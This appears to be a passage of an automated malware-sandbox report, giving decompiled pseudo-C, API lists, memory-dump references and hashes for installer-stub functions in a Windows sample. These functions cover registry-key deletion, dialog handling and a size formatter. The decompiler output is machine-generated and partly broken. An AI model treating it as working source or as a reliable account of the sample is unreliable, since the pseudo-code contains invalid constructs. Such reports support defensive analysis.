                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nscEE2E.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040247D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseCreateValuelstrlen
                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nscEE2E.tmp
                                                                                                                              • API String ID: 1356686001-146139853
                                                                                                                              • Opcode ID: 7863a0f49a6f39dd7089a52df85a66d0e401da730b8a2c07c6ee90d0110cbeae
                                                                                                                              • Instruction ID: d7b132d9018d44432a73f3315d2b91b6aa1600c7a927e9fa70905f900517fa5a
                                                                                                                              • Opcode Fuzzy Hash: 7863a0f49a6f39dd7089a52df85a66d0e401da730b8a2c07c6ee90d0110cbeae
                                                                                                                              • Instruction Fuzzy Hash: BA1160B1E00209BFEB10AFA0DE49EAF767CFB54398F10413AF905B61D0D7B85D019669
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 709B1837, Relevance: 7.7, APIs: 5, Instructions: 194COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 97%
                                                                                                                              			E709B1837(signed int __edx, void* __eflags, void* _a8, void* _a16) {
				void* _v8;
				signed int _v12;
				signed int _v20;
				signed int _v24;
				char _v52;
				void _t45;
				void _t46;
				signed int _t47;
				signed int _t48;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				signed int _t60;
				signed int _t61;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				signed int _t77;
				void* _t81;
				signed int _t83;
				signed int _t85;
				signed int _t87;
				signed int _t90;
				void* _t101;

				_t85 = __edx;
				 *0x709b405c = _a8;
				_t77 = 0;
				 *0x709b4060 = _a16;
				_v12 = 0;
				_v8 = E709B123B();
				_t90 = E709B12FE(_t42);
				_t87 = _t85;
				_t81 = E709B123B();
				_a8 = _t81;
				_t45 =  *_t81;
				if(_t45 != 0x7e && _t45 != 0x21) {
					_a16 = E709B123B();
					_t77 = E709B12FE(_t74);
					_v12 = _t85;
					GlobalFree(_a16);
					_t81 = _a8;
				}
				_t46 =  *_t81;
				_t101 = _t46 - 0x2f;
				if(_t101 > 0) {
					_t47 = _t46 - 0x3c;
					__eflags = _t47;
					if(_t47 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x3c;
						if( *((char*)(_t81 + 1)) != 0x3c) {
							__eflags = _t87 - _v12;
							if(__eflags > 0) {
								L56:
								_t48 = 0;
								__eflags = 0;
								L57:
								asm("cdq");
								L58:
								_t90 = _t48;
								_t87 = _t85;
								L59:
								E709B1429(_t85, _t90, _t87,  &_v52);
								E709B1266( &_v52);
								GlobalFree(_v8);
								return GlobalFree(_a8);
							}
							if(__eflags < 0) {
								L49:
								__eflags = 0;
								L50:
								_t48 = 1;
								goto L57;
							}
							__eflags = _t90 - _t77;
							if(_t90 < _t77) {
								goto L49;
							}
							goto L56;
						}
						_t85 = _t87;
						_t48 = E709B2EF0(_t90, _t77, _t85);
						goto L58;
					}
					_t57 = _t47 - 1;
					__eflags = _t57;
					if(_t57 == 0) {
						__eflags = _t90 - _t77;
						if(_t90 != _t77) {
							goto L56;
						}
						__eflags = _t87 - _v12;
						if(_t87 != _v12) {
							goto L56;
						}
						goto L49;
					}
					_t58 = _t57 - 1;
					__eflags = _t58;
					if(_t58 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x3e;
						if( *((char*)(_t81 + 1)) != 0x3e) {
							__eflags = _t87 - _v12;
							if(__eflags < 0) {
								goto L56;
							}
							if(__eflags > 0) {
								goto L49;
							}
							__eflags = _t90 - _t77;
							if(_t90 <= _t77) {
								goto L56;
							}
							goto L49;
						}
						__eflags =  *((char*)(_t81 + 2)) - 0x3e;
						_t85 = _t87;
						_t59 = _t90;
						_t83 = _t77;
						if( *((char*)(_t81 + 2)) != 0x3e) {
							_t48 = E709B2F10(_t59, _t83, _t85);
						} else {
							_t48 = E709B2F40(_t59, _t83, _t85);
						}
						goto L58;
					}
					_t60 = _t58 - 0x20;
					__eflags = _t60;
					if(_t60 == 0) {
						_t90 = _t90 ^ _t77;
						_t87 = _t87 ^ _v12;
						goto L59;
					}
					_t61 = _t60 - 0x1e;
					__eflags = _t61;
					if(_t61 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x7c;
						if( *((char*)(_t81 + 1)) != 0x7c) {
							_t90 = _t90 | _t77;
							_t87 = _t87 | _v12;
							goto L59;
						}
						__eflags = _t90 | _t87;
						if((_t90 | _t87) != 0) {
							goto L49;
						}
						__eflags = _t77 | _v12;
						if((_t77 | _v12) != 0) {
							goto L49;
						}
						goto L56;
					}
					__eflags = _t61 == 0;
					if(_t61 == 0) {
						_t90 =  !_t90;
						_t87 =  !_t87;
					}
					goto L59;
				}
				if(_t101 == 0) {
					L21:
					__eflags = _t77 | _v12;
					if((_t77 | _v12) != 0) {
						_v24 = E709B2D80(_t90, _t87, _t77, _v12);
						_v20 = _t85;
						_t48 = E709B2E30(_t90, _t87, _t77, _v12);
						_t81 = _a8;
					} else {
						_v24 = _v24 & 0x00000000;
						_v20 = _v20 & 0x00000000;
						_t48 = _t90;
						_t85 = _t87;
					}
					__eflags =  *_t81 - 0x2f;
					if( *_t81 != 0x2f) {
						goto L58;
					} else {
						_t90 = _v24;
						_t87 = _v20;
						goto L59;
					}
				}
				_t67 = _t46 - 0x21;
				if(_t67 == 0) {
					_t48 = 0;
					__eflags = _t90 | _t87;
					if((_t90 | _t87) != 0) {
						goto L57;
					}
					goto L50;
				}
				_t68 = _t67 - 4;
				if(_t68 == 0) {
					goto L21;
				}
				_t69 = _t68 - 1;
				if(_t69 == 0) {
					__eflags =  *((char*)(_t81 + 1)) - 0x26;
					if( *((char*)(_t81 + 1)) != 0x26) {
						_t90 = _t90 & _t77;
						_t87 = _t87 & _v12;
						goto L59;
					}
					__eflags = _t90 | _t87;
					if((_t90 | _t87) == 0) {
						goto L56;
					}
					__eflags = _t77 | _v12;
					if((_t77 | _v12) == 0) {
						goto L56;
					}
					goto L49;
				}
				_t70 = _t69 - 4;
				if(_t70 == 0) {
					_t48 = E709B2D40(_t90, _t87, _t77, _v12);
					goto L58;
				} else {
					_t71 = _t70 - 1;
					if(_t71 == 0) {
						_t90 = _t90 + _t77;
						asm("adc edi, [ebp-0x8]");
					} else {
						if(_t71 == 0) {
							_t90 = _t90 - _t77;
							asm("sbb edi, [ebp-0x8]");
						}
					}
					goto L59;
				}
			}





























                                                                                                                              0x709b1837
                                                                                                                              0x709b1841
                                                                                                                              0x709b184a
                                                                                                                              0x709b184d
                                                                                                                              0x709b1852
                                                                                                                              0x709b185b
                                                                                                                              0x709b1864
                                                                                                                              0x709b1866
                                                                                                                              0x709b186d
                                                                                                                              0x709b186f
                                                                                                                              0x709b1872
                                                                                                                              0x709b1876
                                                                                                                              0x709b1882
                                                                                                                              0x709b188b
                                                                                                                              0x709b1890
                                                                                                                              0x709b1893
                                                                                                                              0x709b1899
                                                                                                                              0x709b1899
                                                                                                                              0x709b189c
                                                                                                                              0x709b189f
                                                                                                                              0x709b18a2
                                                                                                                              0x709b1968
                                                                                                                              0x709b1968
                                                                                                                              0x709b196b
                                                                                                                              0x709b19e5
                                                                                                                              0x709b19e9
                                                                                                                              0x709b19f8
                                                                                                                              0x709b19fb
                                                                                                                              0x709b1a03
                                                                                                                              0x709b1a03
                                                                                                                              0x709b1a03
                                                                                                                              0x709b1a05
                                                                                                                              0x709b1a05
                                                                                                                              0x709b1a06
                                                                                                                              0x709b1a06
                                                                                                                              0x709b1a08
                                                                                                                              0x709b1a0a
                                                                                                                              0x709b1a10
                                                                                                                              0x709b1a19
                                                                                                                              0x709b1a2a
                                                                                                                              0x709b1a35
                                                                                                                              0x709b1a35
                                                                                                                              0x709b19fd
                                                                                                                              0x709b19e0
                                                                                                                              0x709b19e0
                                                                                                                              0x709b19e2
                                                                                                                              0x709b19e2
                                                                                                                              0x00000000
                                                                                                                              0x709b19e2
                                                                                                                              0x709b19ff
                                                                                                                              0x709b1a01
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x709b1a01
                                                                                                                              0x709b19ed
                                                                                                                              0x709b19f1
                                                                                                                              0x00000000
                                                                                                                              0x709b19f1
                                                                                                                              0x709b196d
                                                                                                                              0x709b196d
                                                                                                                              0x709b196e
                                                                                                                              0x709b19d7
                                                                                                                              0x709b19d9
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x709b19db
                                                                                                                              0x709b19de
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x709b19de
                                                                                                                              0x709b1970
                                                                                                                              0x709b1970
                                                                                                                              0x709b1971
                                                                                                                              0x709b19aa
                                                                                                                              0x709b19ae
                                                                                                                              0x709b19ca
                                                                                                                              0x709b19cd
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x709b19cf
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x709b19d1
                                                                                                                              0x709b19d3
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x709b19d5
                                                                                                                              0x709b19b0
                                                                                                                              0x709b19b4
                                                                                                                              0x709b19b6
                                                                                                                              0x709b19b8
                                                                                                                              0x709b19ba
                                                                                                                              0x709b19c3
                                                                                                                              0x709b19bc
                                                                                                                              0x709b19bc
                                                                                                                              0x709b19bc
                                                                                                                              0x00000000
                                                                                                                              0x709b19ba
                                                                                                                              0x709b1973
                                                                                                                              0x709b1973
                                                                                                                              0x709b1976
                                                                                                                              0x709b19a3
                                                                                                                              0x709b19a5
                                                                                                                              0x00000000
                                                                                                                              0x709b19a5
                                                                                                                              0x709b1978
                                                                                                                              0x709b1978
                                                                                                                              0x709b197b
                                                                                                                              0x709b198b
                                                                                                                              0x709b198f
                                                                                                                              0x709b199c
                                                                                                                              0x709b199e
                                                                                                                              0x00000000
                                                                                                                              0x709b199e
                                                                                                                              0x709b1991
                                                                                                                              0x709b1993
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x709b1995
                                                                                                                              0x709b1998
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x709b199a
                                                                                                                              0x709b197e
                                                                                                                              0x709b197f
                                                                                                                              0x709b1985
                                                                                                                              0x709b1987
                                                                                                                              0x709b1987
                                                                                                                              0x00000000
                                                                                                                              0x709b197f
                                                                                                                              0x709b18a8
                                                                                                                              0x709b1920
                                                                                                                              0x709b1922
                                                                                                                              0x709b1925
                                                                                                                              0x709b1943
                                                                                                                              0x709b1946
                                                                                                                              0x709b194c
                                                                                                                              0x709b1951
                                                                                                                              0x709b1927
                                                                                                                              0x709b1927
                                                                                                                              0x709b192b
                                                                                                                              0x709b192f
                                                                                                                              0x709b1931
                                                                                                                              0x709b1931
                                                                                                                              0x709b1954
                                                                                                                              0x709b1957
                                                                                                                              0x00000000
                                                                                                                              0x709b195d
                                                                                                                              0x709b195d
                                                                                                                              0x709b1960
                                                                                                                              0x00000000
                                                                                                                              0x709b1960
                                                                                                                              0x709b1957
                                                                                                                              0x709b18aa
                                                                                                                              0x709b18ad
                                                                                                                              0x709b1911
                                                                                                                              0x709b1913
                                                                                                                              0x709b1915
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x709b191b
                                                                                                                              0x709b18af
                                                                                                                              0x709b18b2
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x709b18b4
                                                                                                                              0x709b18b5
                                                                                                                              0x709b18eb
                                                                                                                              0x709b18ef
                                                                                                                              0x709b1907
                                                                                                                              0x709b1909
                                                                                                                              0x00000000
                                                                                                                              0x709b1909
                                                                                                                              0x709b18f1
                                                                                                                              0x709b18f3
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x709b18f9
                                                                                                                              0x709b18fc
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x709b1902
                                                                                                                              0x709b18b7
                                                                                                                              0x709b18ba
                                                                                                                              0x709b18e1
                                                                                                                              0x00000000
                                                                                                                              0x709b18bc
                                                                                                                              0x709b18bc
                                                                                                                              0x709b18bd
                                                                                                                              0x709b18d1
                                                                                                                              0x709b18d3
                                                                                                                              0x709b18bf
                                                                                                                              0x709b18c1
                                                                                                                              0x709b18c7
                                                                                                                              0x709b18c9
                                                                                                                              0x709b18c9
                                                                                                                              0x709b18c1
                                                                                                                              0x00000000
                                                                                                                              0x709b18bd

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.204153248.00000000709B1000.00000020.00020000.sdmp, Offset: 709B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.204144717.00000000709B0000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.204159626.00000000709B3000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.204167409.00000000709B5000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeGlobal
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2979337801-0
                                                                                                                              • Opcode ID: e50337180c30812b0af4b64192022405811c005776d64b2b3a7507efdb2f1eaa
                                                                                                                              • Instruction ID: 6f1a4496c32a5ad330aede53e34c9f2c5f6bc9cc9cd328a916479db3478367f7
                                                                                                                              • Opcode Fuzzy Hash: e50337180c30812b0af4b64192022405811c005776d64b2b3a7507efdb2f1eaa
                                                                                                                              • Instruction Fuzzy Hash: 16510832D041D8EEDB029FA4D8486ADBBBFEB45675FE40159D40AA3324C23D7E419753
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00402A36, Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 84%
                                                                                                                              			E00402A36(void* _a4, char* _a8, long _a12) {
				void* _v8;
				char _v272;
				signed char _t16;
				long _t18;
				long _t25;
				intOrPtr* _t27;
				long _t28;

				_t16 =  *0x423f50; // 0x0
				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						__eflags = _a12;
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							__eflags = 1;
							return 1;
						}
						_t25 = E00402A36(_v8,  &_v272, 0);
						__eflags = _t25;
						if(_t25 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405E88(2);
					if(_t27 == 0) {
						__eflags =  *0x423f50; // 0x0
						if(__eflags != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						__eflags = _t28;
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x423f50, 0);
				}
				return _t18;
			}










                                                                                                                              0x00402a46
                                                                                                                              0x00402a57
                                                                                                                              0x00402a5f
                                                                                                                              0x00402a87
                                                                                                                              0x00402a6e
                                                                                                                              0x00402a71
                                                                                                                              0x00402ac1
                                                                                                                              0x00402ac7
                                                                                                                              0x00402ac9
                                                                                                                              0x00000000
                                                                                                                              0x00402ac9
                                                                                                                              0x00402a7e
                                                                                                                              0x00402a83
                                                                                                                              0x00402a85
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00402a85
                                                                                                                              0x00402a9c
                                                                                                                              0x00402aa4
                                                                                                                              0x00402aab
                                                                                                                              0x00402ad1
                                                                                                                              0x00402ad7
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00402adf
                                                                                                                              0x00402ae5
                                                                                                                              0x00402ae7
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00402ae7
                                                                                                                              0x00000000
                                                                                                                              0x00402aba
                                                                                                                              0x00402ace

                                                                                                                              APIs
                                                                                                                              • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A57
                                                                                                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A93
                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402A9C
                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402AC1
                                                                                                                              • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402ADF
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: Close$DeleteEnumOpen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1912718029-0
                                                                                                                              • Opcode ID: 90165163457562f2d2db0d0e016cf4740f9c141c2854e05e69f214c53397e3bf
                                                                                                                              • Instruction ID: 3ec7b1818cbfc33efeafaf7017db19c7c479205e5d6f4ff66fb244667a93d6f3
                                                                                                                              • Opcode Fuzzy Hash: 90165163457562f2d2db0d0e016cf4740f9c141c2854e05e69f214c53397e3bf
                                                                                                                              • Instruction Fuzzy Hash: 93112971A00009FFDF319F90DE49EAF7B7DEB44385B104436F905A10A0DBB59E51AE69
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00401CC1, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E00401CC1(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
				GetClientRect(_t25, _t27 - 0x40);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029F6(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                                                                                                              0x00401ccb
                                                                                                                              0x00401cd2
                                                                                                                              0x00401d01
                                                                                                                              0x00401d09
                                                                                                                              0x00401d10
                                                                                                                              0x00401d10
                                                                                                                              0x0040288e
                                                                                                                              0x0040289a

                                                                                                                              APIs
                                                                                                                              • GetDlgItem.USER32 ref: 00401CC5
                                                                                                                              • GetClientRect.USER32 ref: 00401CD2
                                                                                                                              • LoadImageA.USER32 ref: 00401CF3
                                                                                                                              • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00401D10
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1849352358-0
                                                                                                                              • Opcode ID: 70cca8153c69b2e132429069c22b9ddf05dbb7ba62a9a7cfa9b79a9bcebcea9b
                                                                                                                              • Instruction ID: de7316f9b9f1bcc3f0c1dff9ae5dc63c91f1472c52c052d8cf8a0da7f27950be
                                                                                                                              • Opcode Fuzzy Hash: 70cca8153c69b2e132429069c22b9ddf05dbb7ba62a9a7cfa9b79a9bcebcea9b
                                                                                                                              • Instruction Fuzzy Hash: D5F01DB2E04105BFD700EFA4EE89DAFB7BDEB44345B104576F602F2190C6789D018B69
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004046F1, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 51%
                                                                                                                              			E004046F1(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E00405B88(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E00405B88(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E00405B88(_t34, 0, 0x4204a0, 0x4204a0, _a8);
				wsprintfA(_t26 + lstrlenA(0x4204a0), "%u.%u%s%s");
				return SetDlgItemTextA( *0x423678, _a4, 0x4204a0);
			}













                                                                                                                              0x004046f9
                                                                                                                              0x004046fd
                                                                                                                              0x00404705
                                                                                                                              0x00404708
                                                                                                                              0x00404709
                                                                                                                              0x0040470b
                                                                                                                              0x0040470d
                                                                                                                              0x00404710
                                                                                                                              0x00404710
                                                                                                                              0x00404717
                                                                                                                              0x0040471d
                                                                                                                              0x0040471d
                                                                                                                              0x00404724
                                                                                                                              0x0040472f
                                                                                                                              0x00404730
                                                                                                                              0x00404733
                                                                                                                              0x00404733
                                                                                                                              0x00404740
                                                                                                                              0x0040474b
                                                                                                                              0x0040474e
                                                                                                                              0x00404760
                                                                                                                              0x00404767
                                                                                                                              0x00404768
                                                                                                                              0x00404777
                                                                                                                              0x00404787
                                                                                                                              0x004047a3

                                                                                                                              APIs
                                                                                                                              • lstrlenA.KERNEL32(004204A0,004204A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404611,000000DF,0000040F,00000400,00000000), ref: 0040477F
                                                                                                                              • wsprintfA.USER32 ref: 00404787
                                                                                                                              • SetDlgItemTextA.USER32 ref: 0040479A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                                              • String ID: %u.%u%s%s
                                                                                                                              • API String ID: 3540041739-3551169577
                                                                                                                              • Opcode ID: 900e3a4788bbcdb5831f4eb4ea085b1ecc54347093cfae2cf180548b061950ae
                                                                                                                              • Instruction ID: e1128f73888b2767c9277aed1687fd20c93e739cc52df1aac9c0a45a5a8dde9d
                                                                                                                              • Opcode Fuzzy Hash: 900e3a4788bbcdb5831f4eb4ea085b1ecc54347093cfae2cf180548b061950ae
                                                                                                                              • Instruction Fuzzy Hash: 7311E2736001243BDB10666D9C46EEF3699DBC6335F14423BFA25F61D1E938AC5286A8
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00401BAD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 51%
                                                                                                                              			E00401BAD() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 0x34) = E004029D9(3);
				 *(_t55 + 8) = E004029D9(4);
				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x34)) = E004029F6(0x33);
				}
				__eflags =  *(_t55 - 0x10) & 0x00000002;
				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
					 *(_t55 + 8) = E004029F6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E004029F6();
					_t28 = E004029F6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029D9();
					_t37 = E004029D9();
					_t48 =  *(_t55 - 0x10) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
						L10:
						 *(_t55 - 8) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
					_push( *(_t55 - 8));
					E00405AC4();
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                                                                                                                              0x00401bb6
